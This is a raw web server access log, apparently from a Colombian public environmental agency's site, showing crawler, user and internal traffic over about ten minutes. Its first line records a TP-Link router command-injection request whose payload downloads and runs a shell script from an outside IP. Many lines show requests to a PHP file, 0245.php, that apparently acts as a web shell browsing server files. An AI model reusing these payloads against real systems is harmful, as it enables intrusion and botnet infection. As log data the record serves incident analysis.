45.148.10.202 - - [15/Jul/2024:06:08:50 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 1018
66.249.66.39 - - [15/Jul/2024:06:08:58 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.66.37 - - [15/Jul/2024:06:08:58 -0500] "GET /desde-el-1-de-mayo-habra-nueva-normativa-para-la-gestion-de-aceites-usados-de-origen-industrial.html HTTP/1.1" 200 1006
201.245.192.253 - - [15/Jul/2024:06:09:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Jul/2024:06:10:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.217 - - [15/Jul/2024:06:10:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=effect-scale.min.js HTTP/1.1" 200 2747
47.128.16.108 - - [15/Jul/2024:06:10:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5C&f=mysql_start.bat&ft=code&white=1 HTTP/1.1" 200 370
47.128.61.216 - - [15/Jul/2024:06:10:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=memo6.doc HTTP/1.1" 200 2739
52.167.144.163 - - [15/Jul/2024:06:10:36 -0500] "GET /Publicaciones/2024EE127998.pdf HTTP/1.1" 404 228
52.167.144.163 - - [15/Jul/2024:06:10:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2017%2F HTTP/1.1" 200 296000
47.128.127.67 - - [15/Jul/2024:06:10:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cfiles%5Csearch&f=search46.xml&ft=info HTTP/1.1" 200 3758
47.128.53.138 - - [15/Jul/2024:06:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=perldoc.pod HTTP/1.1" 200 2739
201.245.192.253 - - [15/Jul/2024:06:11:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.39.33 - - [15/Jul/2024:06:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=arrows-2x.png&ft=code&white=1 HTTP/1.1" 200 880
47.128.122.106 - - [15/Jul/2024:06:11:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5C&f=autologin.html&ft=info&fullhexdump=1 HTTP/1.1" 200 4452
201.245.192.253 - - [15/Jul/2024:06:11:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
47.128.116.49 - - [15/Jul/2024:06:11:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=8586.pdf HTTP/1.1" 200 2739
47.128.124.69 - - [15/Jul/2024:06:11:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=accordion.min.js&ft=info&white=1 HTTP/1.1" 200 3698
47.128.22.18 - - [15/Jul/2024:06:11:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos%5C&f=index.html&ft=img&white=1 HTTP/1.1" 200 -
35.94.109.231 - - [15/Jul/2024:06:11:43 -0500] "GET /Publicaciones/2024EE123355.pdf HTTP/1.1" 404 228
66.249.66.20 - - [15/Jul/2024:06:11:43 -0500] "GET /IsolucionSDA/IsolucionSDA/BancoConocimiento/L/Ley1562del11deJuliode2012/Ley1562del11deJuliode2012.asp?IdArticulo=6556 HTTP/1.1" 404 5030
201.245.192.253 - - [15/Jul/2024:06:12:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:06:11:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.19 - - [15/Jul/2024:06:12:46 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-20.pdf HTTP/1.1" 304 -
66.249.66.19 - - [15/Jul/2024:06:12:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0250.pdf HTTP/1.1" 304 -
66.249.66.21 - - [15/Jul/2024:06:12:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1566.pdf HTTP/1.1" 200 342843
66.249.66.19 - - [15/Jul/2024:06:12:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/3519.pdf HTTP/1.1" 200 815827
66.249.66.20 - - [15/Jul/2024:06:12:51 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/PARTE%20B/Dise%C3%B1o%20de%20Elementos%20M-131.pdf HTTP/1.1" 304 -
216.245.221.92 - - [15/Jul/2024:06:12:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Jul/2024:06:13:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [15/Jul/2024:06:11:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
66.249.66.21 - - [15/Jul/2024:06:13:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201995/0031.pdf HTTP/1.1" 200 68070
216.244.66.195 - - [15/Jul/2024:06:13:47 -0500] "GET /BLA/resoluciones/AUTOS%202022/4070.pdf HTTP/1.1" 200 438703
216.244.66.195 - - [15/Jul/2024:06:13:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/4409.pdf HTTP/1.1" 200 459077
201.245.192.253 - - [15/Jul/2024:06:14:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [15/Jul/2024:06:14:28 -0500] "GET /BLA/resoluciones/AUTOS%202022/4767.pdf HTTP/1.1" 200 385793
172.22.2.4 - - [15/Jul/2024:06:13:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
172.22.2.4 - - [15/Jul/2024:06:14:50 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000003%20DEL%2021%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 304 -
216.244.66.195 - - [15/Jul/2024:06:14:58 -0500] "GET /BLA/resoluciones/AUTOS%202022/4837.pdf HTTP/1.1" 200 380060
201.245.192.253 - - [15/Jul/2024:06:15:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [15/Jul/2024:06:15:03 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.53.12.168 - - [15/Jul/2024:06:15:03 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:03 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12409
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:04 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:08 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2224
181.53.12.168 - - [15/Jul/2024:06:15:08 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16351
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:10 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:10 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.168 - - [15/Jul/2024:06:15:10 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:10 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:14 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:14 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
181.53.12.168 - - [15/Jul/2024:06:15:15 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65190
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 59042
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:15:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 51784
216.244.66.195 - - [15/Jul/2024:06:15:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1910.pdf HTTP/1.1" 200 361515
181.53.12.168 - - [15/Jul/2024:06:15:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 25141
172.22.2.4 - - [15/Jul/2024:06:15:36 -0500] "POST /BLA/boletinlegal/sdk HTTP/1.1" 404 1018
172.22.2.4 - - [15/Jul/2024:06:15:36 -0500] "GET /BLA/boletinlegal/odinhttpcall1721042122 HTTP/1.1" 404 1018
172.22.2.4 - - [15/Jul/2024:06:15:37 -0500] "GET /BLA/boletinlegal/evox/about HTTP/1.1" 404 1018
172.22.2.4 - - [15/Jul/2024:06:15:37 -0500] "GET /BLA/boletinlegal/HNAP1 HTTP/1.1" 404 1018
181.53.12.168 - - [15/Jul/2024:06:15:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 6295
181.53.12.168 - - [15/Jul/2024:06:15:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 9544
216.244.66.195 - - [15/Jul/2024:06:15:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2514.pdf HTTP/1.1" 200 398598
201.245.192.253 - - [15/Jul/2024:06:16:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [15/Jul/2024:06:16:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 7342
201.245.192.253 - - [15/Jul/2024:06:16:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
47.128.111.214 - - [15/Jul/2024:06:16:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=Reportaje-2.flv HTTP/1.1" 200 2980
216.244.66.195 - - [15/Jul/2024:06:16:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2774.pdf HTTP/1.1" 200 287207
172.22.2.4 - - [15/Jul/2024:06:15:39 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [15/Jul/2024:06:15:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [15/Jul/2024:06:16:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
172.22.2.4 - - [15/Jul/2024:06:15:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [15/Jul/2024:06:15:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
47.128.18.176 - - [15/Jul/2024:06:16:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=processes&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5CResiduos%5Cimg%5C HTTP/1.1" 200 3524
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 24614
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.18.222 - - [15/Jul/2024:06:16:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=winpm-32.exe.manifest&ft=code&white=1 HTTP/1.1" 200 393
216.244.66.195 - - [15/Jul/2024:06:16:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3149.pdf HTTP/1.1" 200 263862
172.22.2.4 - - [15/Jul/2024:06:15:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
181.53.12.168 - - [15/Jul/2024:06:16:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 6631
47.128.60.175 - - [15/Jul/2024:06:16:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cfiles&f=guia_lavado-vehic.pdf&ft=info HTTP/1.1" 200 3662
181.53.12.168 - - [15/Jul/2024:06:16:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 1704
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarProyectoSolicitud.xhtml HTTP/1.1" 200 74151
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:16:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.54.244 - - [15/Jul/2024:06:16:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=msendto.exe&ft=info HTTP/1.1" 200 3592
201.245.192.253 - - [15/Jul/2024:06:17:00 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [15/Jul/2024:06:17:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0978.pdf HTTP/1.1" 200 575315
47.128.44.139 - - [15/Jul/2024:06:17:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=upgmxeagent.dll HTTP/1.1" 200 2744
181.53.12.168 - - [15/Jul/2024:06:17:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarActividadSolicitud.xhtml HTTP/1.1" 200 59005
181.53.12.168 - - [15/Jul/2024:06:17:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarActividadSolicitud.xhtml HTTP/1.1" 200 57683
181.53.12.168 - - [15/Jul/2024:06:17:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
47.128.39.32 - - [15/Jul/2024:06:17:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=predis.txt&ft=html&white=1 HTTP/1.1" 200 125
181.53.12.168 - - [15/Jul/2024:06:17:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarActividadSolicitud.xhtml HTTP/1.1" 200 20106
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.49.63 - - [15/Jul/2024:06:17:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Cbin&f=version.sh&ft=info HTTP/1.1" 200 3713
216.244.66.195 - - [15/Jul/2024:06:17:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1640.pdf HTTP/1.1" 200 290337
47.128.41.114 - - [15/Jul/2024:06:17:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=server_variables.php&ft=info HTTP/1.1" 200 3663
66.249.66.19 - - [15/Jul/2024:06:17:40 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.20 - - [15/Jul/2024:06:17:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%2001-%2050/00000025.tif HTTP/1.1" 200 92082
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProyectoActividad/asociarFuentesSolicitud.xhtml HTTP/1.1" 200 82550
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.18.156 - - [15/Jul/2024:06:17:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGestion+Documental%5Cdlf%5C&f=text.png&ft=html&white=1 HTTP/1.1" 200 456
216.244.66.195 - - [15/Jul/2024:06:17:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2463.pdf HTTP/1.1" 200 397580
66.249.66.20 - - [15/Jul/2024:06:17:51 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/1195.pdf HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [15/Jul/2024:06:17:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/crearModificarSolicitudProceso.xhtml HTTP/1.1" 200 45551
181.53.12.168 - - [15/Jul/2024:06:17:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
